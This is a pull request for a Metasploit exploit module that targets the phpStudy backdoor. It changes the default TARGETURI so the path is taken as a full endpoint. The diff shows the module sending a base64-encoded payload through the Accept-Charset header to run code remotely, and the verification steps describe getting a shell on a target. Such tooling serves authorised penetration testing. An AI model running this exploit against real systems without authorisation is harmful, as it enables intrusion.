### PR TITLE
TARGETURI Default value modification

### DIFF
--- a/modules/exploits/multi/http/phpstudy_backdoor_rce.rb
+++ b/modules/exploits/multi/http/phpstudy_backdoor_rce.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'The base path', '/'])
+        OptString.new('TARGETURI', [true, 'The base path', '/l.php'])
       ])
   end
   def check
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fingerprint = Rex::Text.rand_text_alpha(8)
     res = send_request_cgi({
       'method'  =>  'GET',
-      'uri'     =>  normalize_uri(uri, 'index.php'),
+      'uri'     =>  normalize_uri(uri),
       'headers' =>  {
         'Accept-Encoding' =>  'gzip,deflate',
         'Accept-Charset'  =>  Rex::Text.encode_base64("echo '#{fingerprint}';")
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good("Sending shellcode")
     res = send_request_cgi({
       'method'  => 'GET',
-      'uri'     => normalize_uri(uri, 'index.php'),
+      'uri'     => normalize_uri(uri),
       'headers' => {
           'Accept-Encoding' => 'gzip,deflate',
           'Accept-Charset'  => Rex::Text.encode_base64(payload.encoded)


### PR DESCRIPTION
This PR changes the treatment of `TARGETURI` within `modules/exploits/multi/http/phpstudy_backdoor_rce.rb` so that it will treat `TARGETURI` as a single endpoint and not as a directory that `index.php` is appended to. This makes sure that `TARGETURI` falls in line with its intended usage and also ensures that users can switch between specifying the `l.php` and `index.php` files if needed, as some vulnerable targets may have one file and not the other and vice versa.


## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/multi/http/phpstudy_backdoor_rce`
- [x] `set RHOSTS *target_ip*`
- [x] `set TARGETURI /index.php`
- [x] `exploit`
- [x] **Verify** that you get a shell on the target.
- [ ] **Verify** that you do not get a path of `/index.php/index.php`

